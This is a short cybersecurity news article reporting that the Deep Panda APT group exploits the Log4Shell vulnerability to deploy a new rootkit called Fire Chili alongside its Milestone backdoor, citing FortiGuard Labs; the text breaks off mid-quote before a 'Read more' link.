Deep Panda Returns With Log4Shell Exploits, New Fire Chili Rootkit

Share on facebook
Share on twitter
Share on linkedin
Share on reddit

Deep Panda has launched new attacks this month that exploit Log4Shell to deploy the new Fire Chili rootkit.

Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. The APT targets government, defense, healthcare, telecoms, and financial organizations, to name a few, for purposes including data theft and surveillance.

The cyberattackers have a wide range of malicious tools, including the Milestone backdoor and the Infoadmin Remote Access Trojan (RAT) based on Gh0st RAT code. There may also be affiliation to Winnti, a separate Chinese group known to target game developers and vendors.

A new campaign detected by FortiGuard Labs researchers is the work of Deep Panda, which is targeting organizations in the finance, travel, and cosmetic industries.

During the past month, FortiGuard has detected the group’s active exploitation of Log4Shell, a critical vulnerability in the Apache Log4J Java logging library (CVE-2021-44228, CVSS 10.0), to spread a new, “novel” rootkit.

Attackers from various groups use Log4Shell to compromise VMware Horizon servers for data exfiltration and cryptojacking.

In Deep Panda’s case, the new rootkit, dubbed Fire Chili, is designed to keep activities under the radar and is deployed alongside the Milestone backdoor.

Fire Chili has been signed with a stolen digital certificate — the same used by Winnti to sign-off malicious tools — and will check to ensure the victim machine is not running in safe mode.

“It then checks

Read more

Explore the site

More from the blog

Latest News